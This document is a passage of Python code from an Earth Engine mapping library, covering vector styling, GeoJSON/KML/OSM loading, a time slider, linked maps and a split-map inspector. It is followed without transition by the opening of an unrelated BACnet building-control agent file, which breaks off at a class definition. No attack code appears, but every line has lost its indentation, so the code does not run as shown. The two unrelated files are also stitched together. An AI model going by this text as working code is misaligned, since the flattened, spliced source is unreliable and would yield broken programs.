vis["pointShape"] = point_shape.value
vis["width"] = line_width.value
vis["lineType"] = line_type.value
vis["fillColor"] = fill_color.value[1:] + str(
hex(int(fill_color_opacity.value * 255))
)[2:].zfill(2)
return vis
def import_btn_clicked(b):
vis = get_vis_params()
create_code_cell(f"vis_params = {str(vis)}")
def apply_btn_clicked(b):
compute_label.value = "Computing ..."
if new_layer_name.value in self.ee_layer_names:
old_layer = new_layer_name.value
if "legend" in self.ee_layer_dict[old_layer].keys():
legend = self.ee_layer_dict[old_layer]["legend"]
if legend in self.controls:
self.remove_control(legend)
legend.close()
if "colorbar" in self.ee_layer_dict[old_layer].keys():
colorbar = self.ee_layer_dict[old_layer]["colorbar"]
if colorbar in self.controls:
self.remove_control(colorbar)
colorbar.close()
if not style_chk.value:
vis = get_vis_params()
self.addLayer(ee_object.style(**vis), {}, new_layer_name.value)
ee_layer.visible = False
elif (
style_chk.value and len(palette.value) > 0 and "," in palette.value
):
colors = ee.List(
[
color.strip()
+ str(hex(int(fill_color_opacity.value * 255)))[2:].zfill(2)
for color in palette.value.split(",")
]
)
arr = ee_object.aggregate_array(field.value).distinct().sort()
fc = ee_object.map(
lambda f: f.set({"styleIndex": arr.indexOf(f.get(field.value))})
)
step = arr.size().divide(colors.size()).ceil()
fc = fc.map(
lambda f: f.set(
{
"style": {
"color": color.value[1:]
+ str(hex(int(color_opacity.value * 255)))[
2:
].zfill(2),
"pointSize": point_size.value,
"pointShape": point_shape.value,
"width": line_width.value,
"lineType": line_type.value,
"fillColor": colors.get(
ee.Number(
ee.Number(f.get("styleIndex")).divide(step)
).floor()
),
}
}
)
)
self.addLayer(
fc.style(**{"styleProperty": "style"}),
{},
f"{new_layer_name.value}",
)
if (
len(palette.value)
and legend_chk.value
and len(legend_labels.value) > 0
):
legend_colors = [
color.strip() for color in palette.value.split(",")
]
legend_keys = [
label.strip() for label in legend_labels.value.split(",")
]
self.add_legend(
legend_title=legend_title.value,
legend_keys=legend_keys,
legend_colors=legend_colors,
layer_name=new_layer_name.value,
)
ee_layer.visible = False
compute_label.value = ""
def close_btn_clicked(b):
self.remove_control(self.vis_control)
self.vis_control.close()
self.vis_widget.close()
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl.close()
self.colorbar_widget.close()
import_btn.on_click(import_btn_clicked)
apply_btn.on_click(apply_btn_clicked)
close_btn.on_click(close_btn_clicked)
vis_widget.children = [
label,
new_layer_name,
widgets.HBox([color, color_opacity, color_opacity_label]),
widgets.HBox([point_size, point_shape]),
widgets.HBox([line_width, line_type]),
widgets.HBox(
[fill_color, fill_color_opacity, fill_color_opacity_label]
),
style_vbox,
widgets.HBox([import_btn, apply_btn, close_btn]),
]
if geometry_type(ee_object) in ["Point", "MultiPoint"]:
point_size.disabled = False
point_shape.disabled = False
else:
point_size.disabled = True
point_shape.disabled = True
return vis_widget
def add_styled_vector(
self, ee_object, column, palette, layer_name="Untitled", **kwargs
):
"""Adds a styled vector to the map.
Args:
ee_object (object): An ee.FeatureCollection.
column (str): The column name to use for styling.
palette (list | dict): The palette (e.g., list of colors or a dict containing label and color pairs) to use for styling.
layer_name (str, optional): The name to be used for the new layer. Defaults to "Untitled".
"""
styled_vector = vector_styling(ee_object, column, palette, **kwargs)
self.addLayer(styled_vector.style(**{"styleProperty": "style"}), {}, layer_name)
def add_shapefile(
self,
in_shp,
layer_name="Untitled",
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
):
"""Adds a shapefile to the map.
Args:
in_shp (str): The input file path to the shapefile.
layer_name (str, optional): The layer name to be used.. Defaults to "Untitled".
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
Raises:
FileNotFoundError: The provided shapefile could not be found.
"""
in_shp = os.path.abspath(in_shp)
if not os.path.exists(in_shp):
raise FileNotFoundError("The provided shapefile could not be found.")
geojson = shp_to_geojson(in_shp)
self.add_geojson(
geojson,
layer_name,
style,
hover_style,
style_callback,
fill_colors,
info_mode,
)
def add_geojson(
self,
in_geojson,
layer_name="Untitled",
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
):
"""Adds a GeoJSON file to the map.
Args:
in_geojson (str | dict): The file path or http URL to the input GeoJSON or a dictionary containing the geojson.
layer_name (str, optional): The layer name to be used.. Defaults to "Untitled".
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
Raises:
FileNotFoundError: The provided GeoJSON file could not be found.
"""
import json
import random
import requests
try:
if isinstance(in_geojson, str):
if in_geojson.startswith("http"):
data = requests.get(in_geojson).json()
else:
in_geojson = os.path.abspath(in_geojson)
if not os.path.exists(in_geojson):
raise FileNotFoundError(
"The provided GeoJSON file could not be found."
)
with open(in_geojson, encoding="utf-8") as f:
data = json.load(f)
elif isinstance(in_geojson, dict):
data = in_geojson
else:
raise TypeError("The input geojson must be a type of str or dict.")
except Exception as e:
raise Exception(e)
if not style:
style = {
# "stroke": True,
"color": "#000000",
"weight": 1,
"opacity": 1,
# "fill": True,
# "fillColor": "#ffffff",
"fillOpacity": 0.1,
# "dashArray": "9"
# "clickable": True,
}
elif "weight" not in style:
style["weight"] = 1
if not hover_style:
hover_style = {"weight": style["weight"] + 1, "fillOpacity": 0.5}
def random_color(feature):
return {
"color": "black",
"fillColor": random.choice(fill_colors),
}
toolbar_button = widgets.ToggleButton(
value=True,
tooltip="Toolbar",
icon="info",
layout=widgets.Layout(
width="28px", height="28px", padding="0px 0px 0px 4px"
),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
# button_style="primary",
layout=widgets.Layout(
height="28px", width="28px", padding="0px 0px 0px 4px"
),
)
html = widgets.HTML()
html.layout.margin = "0px 10px 0px 10px"
html.layout.max_height = "250px"
html.layout.max_width = "250px"
output_widget = widgets.VBox(
[widgets.HBox([toolbar_button, close_button]), html]
)
info_control = ipyleaflet.WidgetControl(
widget=output_widget, position="bottomright"
)
if info_mode in ["on_hover", "on_click"]:
self.add_control(info_control)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
output_widget.children = [
widgets.VBox([widgets.HBox([toolbar_button, close_button]), html])
]
else:
output_widget.children = [widgets.HBox([toolbar_button, close_button])]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if info_control in self.controls:
self.remove_control(info_control)
output_widget.close()
close_button.observe(close_btn_click, "value")
def update_html(feature, **kwargs):
value = [
"<h5><b>{}: </b>{}</h5>".format(prop, feature["properties"][prop])
for prop in feature["properties"].keys()
][:-1]
value = """{}""".format("".join(value))
html.value = value
if style_callback is None:
style_callback = random_color
geojson = ipyleaflet.GeoJSON(
data=data,
style=style,
hover_style=hover_style,
style_callback=style_callback,
name=layer_name,
)
if info_mode == "on_hover":
geojson.on_hover(update_html)
elif info_mode == "on_click":
geojson.on_click(update_html)
self.add_layer(geojson)
def add_kml(
self,
in_kml,
layer_name="Untitled",
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
):
"""Adds a GeoJSON file to the map.
Args:
in_kml (str): The input file path to the KML.
layer_name (str, optional): The layer name to be used.. Defaults to "Untitled".
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
Raises:
FileNotFoundError: The provided KML file could not be found.
"""
in_kml = os.path.abspath(in_kml)
if not os.path.exists(in_kml):
raise FileNotFoundError("The provided KML file could not be found.")
self.add_vector(
in_kml,
layer_name,
style=style,
hover_style=hover_style,
style_callback=style_callback,
fill_colors=fill_colors,
info_mode=info_mode,
)
def add_vector(
self,
filename,
layer_name="Untitled",
to_ee=False,
bbox=None,
mask=None,
rows=None,
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
**kwargs,
):
"""Adds any geopandas-supported vector dataset to the map.
Args:
filename (str): Either the absolute or relative path to the file or URL to be opened, or any object with a read() method (such as an open file or StringIO).
layer_name (str, optional): The layer name to use. Defaults to "Untitled".
to_ee (bool, optional): Whether to convert the GeoJSON to ee.FeatureCollection. Defaults to False.
bbox (tuple | GeoDataFrame or GeoSeries | shapely Geometry, optional): Filter features by given bounding box, GeoSeries, GeoDataFrame or a shapely geometry. CRS mis-matches are resolved if given a GeoSeries or GeoDataFrame. Cannot be used with mask. Defaults to None.
mask (dict | GeoDataFrame or GeoSeries | shapely Geometry, optional): Filter for features that intersect with the given dict-like geojson geometry, GeoSeries, GeoDataFrame or shapely geometry. CRS mis-matches are resolved if given a GeoSeries or GeoDataFrame. Cannot be used with bbox. Defaults to None.
rows (int or slice, optional): Load in specific rows by passing an integer (first n rows) or a slice() object.. Defaults to None.
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
"""
if not filename.startswith("http"):
filename = os.path.abspath(filename)
if to_ee:
fc = vector_to_ee(
filename,
bbox=bbox,
mask=mask,
rows=rows,
geodesic=True,
**kwargs,
)
self.addLayer(fc, {}, layer_name)
else:
ext = os.path.splitext(filename)[1].lower()
if ext == ".shp":
self.add_shapefile(
filename,
layer_name,
style,
hover_style,
style_callback,
fill_colors,
info_mode,
)
elif ext in [".json", ".geojson"]:
self.add_geojson(
filename,
layer_name,
style,
hover_style,
style_callback,
fill_colors,
info_mode,
)
else:
geojson = vector_to_geojson(
filename,
bbox=bbox,
mask=mask,
rows=rows,
epsg="4326",
**kwargs,
)
self.add_geojson(
geojson,
layer_name,
style,
hover_style,
style_callback,
fill_colors,
info_mode,
)
def add_osm(
self,
query,
layer_name="Untitled",
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
which_result=None,
by_osmid=False,
buffer_dist=None,
to_ee=False,
geodesic=True,
):
"""Adds OSM data to the map.
Args:
query (str | dict | list): Query string(s) or structured dict(s) to geocode.
layer_name (str, optional): The layer name to be used.. Defaults to "Untitled".
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
which_result (INT, optional): Which geocoding result to use. if None, auto-select the first (Multi)Polygon or raise an error if OSM doesn't return one. to get the top match regardless of geometry type, set which_result=1. Defaults to None.
by_osmid (bool, optional): If True, handle query as an OSM ID for lookup rather than text search. Defaults to False.
buffer_dist (float, optional): Distance to buffer around the place geometry, in meters. Defaults to None.
to_ee (bool, optional): Whether to convert the csv to an ee.FeatureCollection.
geodesic (bool, optional): Whether line segments should be interpreted as spherical geodesics. If false, indicates that line segments should be interpreted as planar lines in the specified CRS. If absent, defaults to true if the CRS is geographic (including the default EPSG:4326), or to false if the CRS is projected.
"""
gdf = osm_to_geopandas(
query, which_result=which_result, by_osmid=by_osmid, buffer_dist=buffer_dist
)
geojson = gdf.__geo_interface__
if to_ee:
fc = geojson_to_ee(geojson, geodesic=geodesic)
self.addLayer(fc, {}, layer_name)
self.zoomToObject(fc)
else:
self.add_geojson(
geojson,
layer_name=layer_name,
style=style,
hover_style=hover_style,
style_callback=style_callback,
fill_colors=fill_colors,
info_mode=info_mode,
)
bounds = gdf.bounds.iloc[0]
self.fit_bounds([[bounds[1], bounds[0]], [bounds[3], bounds[2]]])
def add_time_slider(
self,
ee_object,
vis_params={},
region=None,
layer_name="Time series",
labels=None,
time_interval=1,
position="bottomright",
slider_length="150px",
date_format="YYYY-MM-dd",
):
"""Adds a time slider to the map.
Args:
ee_object (ee.Image | ee.ImageCollection): The Image or ImageCollection to visualize.
vis_params (dict, optional): Visualization parameters to use for visualizing image. Defaults to {}.
region (ee.Geometry | ee.FeatureCollection): The region to visualize.
layer_name (str, optional): The layer name to be used. Defaults to "Time series".
labels (list, optional): The list of labels to be used for the time series. Defaults to None.
time_interval (int, optional): Time interval in seconds. Defaults to 1.
position (str, optional): Position to place the time slider, can be any of ['topleft', 'topright', 'bottomleft', 'bottomright']. Defaults to "bottomright".
slider_length (str, optional): Length of the time slider. Defaults to "150px".
date_format (str, optional): The date format to use. Defaults to 'YYYY-MM-dd'.
Raises:
TypeError: If the ee_object is not ee.Image | ee.ImageCollection.
"""
import threading
if isinstance(ee_object, ee.Image):
if region is not None:
if isinstance(region, ee.Geometry):
ee_object = ee_object.clip(region)
elif isinstance(region, ee.FeatureCollection):
ee_object = ee_object.clipToCollection(region)
if layer_name not in self.ee_raster_layer_names:
self.addLayer(ee_object, {}, layer_name, False)
band_names = ee_object.bandNames()
ee_object = ee.ImageCollection(
ee_object.bandNames().map(lambda b: ee_object.select([b]))
)
if labels is not None:
if len(labels) != int(ee_object.size().getInfo()):
raise ValueError(
"The length of labels must be equal to the number of bands in the image."
)
else:
labels = band_names.getInfo()
elif isinstance(ee_object, ee.ImageCollection):
if region is not None:
if isinstance(region, ee.Geometry):
ee_object = ee_object.map(lambda img: img.clip(region))
elif isinstance(region, ee.FeatureCollection):
ee_object = ee_object.map(lambda img: img.clipToCollection(region))
if labels is not None:
if len(labels) != int(ee_object.size().getInfo()):
raise ValueError(
"The length of labels must be equal to the number of images in the ImageCollection."
)
else:
labels = (
ee_object.aggregate_array("system:time_start")
.map(lambda d: ee.Date(d).format(date_format))
.getInfo()
)
else:
raise TypeError("The ee_object must be an ee.Image or ee.ImageCollection")
# if labels is not None:
# size = len(labels)
# else:
# size = ee_object.size().getInfo()
# labels = [str(i) for i in range(1, size + 1)]
first = ee.Image(ee_object.first())
if layer_name not in self.ee_raster_layer_names:
self.addLayer(ee_object.toBands(), {}, layer_name, False)
self.addLayer(first, vis_params, "Image X")
slider = widgets.IntSlider(
min=1,
max=len(labels),
readout=False,
continuous_update=False,
layout=widgets.Layout(width=slider_length),
)
label = widgets.Label(
value=labels[0], layout=widgets.Layout(padding="0px 5px 0px 5px")
)
play_btn = widgets.Button(
icon="play",
tooltip="Play the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
pause_btn = widgets.Button(
icon="pause",
tooltip="Pause the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
close_btn = widgets.Button(
icon="times",
tooltip="Close the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
play_chk = widgets.Checkbox(value=False)
slider_widget = widgets.HBox([slider, label, play_btn, pause_btn, close_btn])
def play_click(b):
play_chk.value = True
def work(slider):
while play_chk.value:
if slider.value < len(labels):
slider.value += 1
else:
slider.value = 1
time.sleep(time_interval)
thread = threading.Thread(target=work, args=(slider,))
thread.start()
def pause_click(b):
play_chk.value = False
play_btn.on_click(play_click)
pause_btn.on_click(pause_click)
def slider_changed(change):
self.default_style = {"cursor": "wait"}
index = slider.value - 1
label.value = labels[index]
image = ee.Image(ee_object.toList(ee_object.size()).get(index))
if layer_name not in self.ee_raster_layer_names:
self.addLayer(ee_object.toBands(), {}, layer_name, False)
self.addLayer(image, vis_params, "Image X")
self.default_style = {"cursor": "default"}
slider.observe(slider_changed, "value")
def close_click(b):
play_chk.value = False
self.toolbar_reset()
self.remove_ee_layer("Image X")
self.remove_ee_layer(layer_name)
if self.slider_ctrl is not None and self.slider_ctrl in self.controls:
self.remove_control(self.slider_ctrl)
slider_widget.close()
close_btn.on_click(close_click)
slider_ctrl = ipyleaflet.WidgetControl(widget=slider_widget, position=position)
self.add_control(slider_ctrl)
self.slider_ctrl = slider_ctrl
def add_xy_data(
self,
in_csv,
x="longitude",
y="latitude",
label=None,
layer_name="Marker cluster",
to_ee=False,
):
"""Adds points from a CSV file containing lat/lon information and display data on the map.
Args:
in_csv (str): The file path to the input CSV file.
x (str, optional): The name of the column containing longitude coordinates. Defaults to "longitude".
y (str, optional): The name of the column containing latitude coordinates. Defaults to "latitude".
label (str, optional): The name of the column containing label information to used for marker popup. Defaults to None.
layer_name (str, optional): The layer name to use. Defaults to "Marker cluster".
to_ee (bool, optional): Whether to convert the csv to an ee.FeatureCollection.
Raises:
FileNotFoundError: The specified input csv does not exist.
ValueError: The specified x column does not exist.
ValueError: The specified y column does not exist.
ValueError: The specified label column does not exist.
"""
import pandas as pd
if not in_csv.startswith("http") and (not os.path.exists(in_csv)):
raise FileNotFoundError("The specified input csv does not exist.")
df = pd.read_csv(in_csv)
col_names = df.columns.values.tolist()
if x not in col_names:
raise ValueError(f"x must be one of the following: {', '.join(col_names)}")
if y not in col_names:
raise ValueError(f"y must be one of the following: {', '.join(col_names)}")
if label is not None and (label not in col_names):
raise ValueError(
f"label must be one of the following: {', '.join(col_names)}"
)
self.default_style = {"cursor": "wait"}
if to_ee:
fc = csv_to_ee(in_csv, latitude=y, longitude=x)
self.addLayer(fc, {}, layer_name)
else:
points = list(zip(df[y], df[x]))
if label is not None:
labels = df[label]
markers = [
ipyleaflet.Marker(
location=point,
draggable=False,
popup=widgets.HTML(str(labels[index])),
)
for index, point in enumerate(points)
]
else:
markers = [
ipyleaflet.Marker(location=point, draggable=False)
for point in points
]
marker_cluster = ipyleaflet.MarkerCluster(markers=markers, name=layer_name)
self.add_layer(marker_cluster)
self.default_style = {"cursor": "default"}
def add_planet_by_month(
self, year=2016, month=1, name=None, api_key=None, token_name="PLANET_API_KEY"
):
"""Adds a Planet global mosaic by month to the map. To get a Planet API key, see https://developers.planet.com/quickstart/apis
Args:
year (int, optional): The year of Planet global mosaic, must be >=2016. Defaults to 2016.
month (int, optional): The month of Planet global mosaic, must be 1-12. Defaults to 1.
name (str, optional): The layer name to use. Defaults to None.
api_key (str, optional): The Planet API key. Defaults to None.
token_name (str, optional): The environment variable name of the API key. Defaults to "PLANET_API_KEY".
"""
layer = planet_tile_by_month(year, month, name, api_key, token_name)
self.add_layer(layer)
def add_planet_by_quarter(
self, year=2016, quarter=1, name=None, api_key=None, token_name="PLANET_API_KEY"
):
"""Adds a Planet global mosaic by quarter to the map. To get a Planet API key, see https://developers.planet.com/quickstart/apis
Args:
year (int, optional): The year of Planet global mosaic, must be >=2016. Defaults to 2016.
quarter (int, optional): The quarter of Planet global mosaic, must be 1-12. Defaults to 1.
name (str, optional): The layer name to use. Defaults to None.
api_key (str, optional): The Planet API key. Defaults to None.
token_name (str, optional): The environment variable name of the API key. Defaults to "PLANET_API_KEY".
"""
layer = planet_tile_by_quarter(year, quarter, name, api_key, token_name)
self.add_layer(layer)
# The functions below are outside the Map class.
def ee_tile_layer(
ee_object, vis_params={}, name="Layer untitled", shown=True, opacity=1.0
):
"""Converts and Earth Engine layer to ipyleaflet TileLayer.
Args:
ee_object (Collection|Feature|Image|MapId): The object to add to the map.
vis_params (dict, optional): The visualization parameters. Defaults to {}.
name (str, optional): The name of the layer. Defaults to 'Layer untitled'.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
opacity (float, optional): The layer's opacity represented as a number between 0 and 1. Defaults to 1.
"""
image = None
if (
not isinstance(ee_object, ee.Image)
and not isinstance(ee_object, ee.ImageCollection)
and not isinstance(ee_object, ee.FeatureCollection)
and not isinstance(ee_object, ee.Feature)
and not isinstance(ee_object, ee.Geometry)
):
err_str = "\n\nThe image argument in 'addLayer' function must be an instance of one of ee.Image, ee.Geometry, ee.Feature or ee.FeatureCollection."
raise AttributeError(err_str)
if (
isinstance(ee_object, ee.geometry.Geometry)
or isinstance(ee_object, ee.feature.Feature)
or isinstance(ee_object, ee.featurecollection.FeatureCollection)
):
features = ee.FeatureCollection(ee_object)
width = 2
if "width" in vis_params:
width = vis_params["width"]
color = "000000"
if "color" in vis_params:
color = vis_params["color"]
image_fill = features.style(**{"fillColor": color}).updateMask(
ee.Image.constant(0.5)
)
image_outline = features.style(
**{"color": color, "fillColor": "00000000", "width": width}
)
image = image_fill.blend(image_outline)
elif isinstance(ee_object, ee.image.Image):
image = ee_object
elif isinstance(ee_object, ee.imagecollection.ImageCollection):
image = ee_object.mosaic()
map_id_dict = ee.Image(image).getMapId(vis_params)
tile_layer = ipyleaflet.TileLayer(
url=map_id_dict["tile_fetcher"].url_format,
attribution="Google Earth Engine",
name=name,
opacity=opacity,
visible=shown,
)
return tile_layer
def linked_maps(
rows=2,
cols=2,
height="400px",
ee_objects=[],
vis_params=[],
labels=[],
label_position="topright",
**kwargs,
):
"""Create linked maps of Earth Engine data layers.
Args:
rows (int, optional): The number of rows of maps to create. Defaults to 2.
cols (int, optional): The number of columns of maps to create. Defaults to 2.
height (str, optional): The height of each map in pixels. Defaults to "400px".
ee_objects (list, optional): The list of Earth Engine objects to use for each map. Defaults to [].
vis_params (list, optional): The list of visualization parameters to use for each map. Defaults to [].
labels (list, optional): The list of labels to show on the map. Defaults to [].
label_position (str, optional): The position of the label, can be [topleft, topright, bottomleft, bottomright]. Defaults to "topright".
Raises:
ValueError: If the length of ee_objects is not equal to rows*cols.
ValueError: If the length of vis_params is not equal to rows*cols.
ValueError: If the length of labels is not equal to rows*cols.
Returns:
ipywidget: A GridspecLayout widget.
"""
grid = widgets.GridspecLayout(rows, cols, grid_gap="0px")
count = rows * cols
maps = []
if len(ee_objects) > 0:
if len(ee_objects) == 1:
ee_objects = ee_objects * count
elif len(ee_objects) < count:
raise ValueError(f"The length of ee_objects must be equal to {count}.")
if len(vis_params) > 0:
if len(vis_params) == 1:
vis_params = vis_params * count
elif len(vis_params) < count:
raise ValueError(f"The length of vis_params must be equal to {count}.")
if len(labels) > 0:
if len(labels) == 1:
labels = labels * count
elif len(labels) < count:
raise ValueError(f"The length of labels must be equal to {count}.")
for i in range(rows):
for j in range(cols):
index = i * rows + j
m = Map(
height=height,
lite_mode=True,
add_google_map=False,
layout=widgets.Layout(margin="0px", padding="0px"),
**kwargs,
)
if len(ee_objects) > 0:
m.addLayer(ee_objects[index], vis_params[index], labels[index])
if len(labels) > 0:
label = widgets.Label(
labels[index], layout=widgets.Layout(padding="0px 5px 0px 5px")
)
control = ipyleaflet.WidgetControl(
widget=label, position=label_position
)
m.add_control(control)
maps.append(m)
widgets.jslink((maps[0], "center"), (m, "center"))
widgets.jslink((maps[0], "zoom"), (m, "zoom"))
output = widgets.Output()
with output:
display(m)
grid[i, j] = output
return grid
def ts_inspector(
layers_dict=None,
left_name=None,
right_name=None,
width="120px",
center=[40, -100],
zoom=4,
**kwargs,
):
add_zoom = True
add_fullscreen = True
if "data_ctrl" not in kwargs:
kwargs["data_ctrl"] = False
if "toolbar_ctrl" not in kwargs:
kwargs["toolbar_ctrl"] = False
if "draw_ctrl" not in kwargs:
kwargs["draw_ctrl"] = False
if "measure_ctrl" not in kwargs:
kwargs["measure_ctrl"] = False
if "zoom_ctrl" not in kwargs:
kwargs["zoom_ctrl"] = False
else:
add_zoom = kwargs["zoom_ctrl"]
if "fullscreen_ctrl" not in kwargs:
kwargs["fullscreen_ctrl"] = False
else:
add_fullscreen = kwargs["fullscreen_ctrl"]
if layers_dict is None:
layers_dict = {}
keys = dict(basemap_tiles).keys()
for key in keys:
if isinstance(basemap_tiles[key], ipyleaflet.WMSLayer):
pass
else:
layers_dict[key] = basemap_tiles[key]
keys = list(layers_dict.keys())
if left_name is None:
left_name = keys[0]
if right_name is None:
right_name = keys[-1]
left_layer = layers_dict[left_name]
right_layer = layers_dict[right_name]
m = Map(center=center, zoom=zoom, google_map=None, **kwargs)
control = ipyleaflet.SplitMapControl(left_layer=left_layer, right_layer=right_layer)
m.add_control(control)
left_dropdown = widgets.Dropdown(
options=keys, value=left_name, layout=widgets.Layout(width=width)
)
left_control = ipyleaflet.WidgetControl(widget=left_dropdown, position="topleft")
m.add_control(left_control)
right_dropdown = widgets.Dropdown(
options=keys, value=right_name, layout=widgets.Layout(width=width)
)
right_control = ipyleaflet.WidgetControl(widget=right_dropdown, position="topright")
m.add_control(right_control)
if add_zoom:
m.add_control(ipyleaflet.ZoomControl())
if add_fullscreen:
m.add_control(ipyleaflet.FullScreenControl())
split_control = None
for ctrl in m.controls:
if isinstance(ctrl, ipyleaflet.SplitMapControl):
split_control = ctrl
break
def left_change(change):
split_control.left_layer.url = layers_dict[left_dropdown.value].url
left_dropdown.observe(left_change, "value")
def right_change(change):
split_control.right_layer.url = layers_dict[right_dropdown.value].url
right_dropdown.observe(right_change, "value")
return m
|
agent.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright (c) 2015, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization
# that has cooperated in the development of these materials, makes
# any warranty, express or implied, or assumes any legal liability
# or responsibility for the accuracy, completeness, or usefulness or
# any information, apparatus, product, software, or process disclosed,
# or represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does
# not necessarily constitute or imply its endorsement, recommendation,
# r favoring by the United States Government or any agency thereof,
# or Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
#}}}
import logging
import sys
import sqlite3
from volttron.platform.vip.agent import Agent, Core, RPC
from volttron.platform.async import AsyncCall
from volttron.platform.agent import utils
utils.setup_logging()
_log = logging.getLogger(__name__)
bacnet_logger = logging.getLogger("bacpypes")
bacnet_logger.setLevel(logging.WARNING)
__version__ = '0.1'
import os.path
import errno
from zmq.utils import jsonapi
from collections import defaultdict
from bacpypes.core import run, stop
from Queue import Queue, Empty
from bemoss_lib.utils.find_own_ip import getIPs
from bacpypes.task import RecurringTask
from bacpypes.apdu import ConfirmedRequestSequence, WhoIsRequest
import bacpypes.core
import threading
#Tweeks to BACpypes to make it play nice with Gevent.
bacpypes.core.enable_sleeping()
bacpypes.core.SPIN = 0.1
from bacpypes.errors import DecodingError
from bacpypes.pdu import Address, GlobalBroadcast
from bacpypes.app import LocalDeviceObject, BIPSimpleApplication
from bacpypes.object import get_datatype
from bacpypes.apdu import (ReadPropertyRequest,
WritePropertyRequest, IAmRequest,
Error,
AbortPDU,
ReadPropertyACK,
SimpleAckPDU,
ReadPropertyMultipleRequest,
ReadPropertyMultipleACK,
PropertyReference,
ReadAccessSpecification,
encode_max_apdu_response)
from bacpypes.primitivedata import Null, Atomic, Enumerated, Integer, Unsigned, Real
from bacpypes.constructeddata import Array, Any, Choice
from bacpypes.basetypes import ServicesSupported
from bacpypes.task import TaskManager
from gevent.event import AsyncResult
path = os.path.dirname(os.path.abspath(__file__))
configFile = os.path.join(path, "bacnet_example_config.csv")
#Make sure the TaskManager singleton exists...
task_manager = TaskManager()
#IO callback
class IOCB:
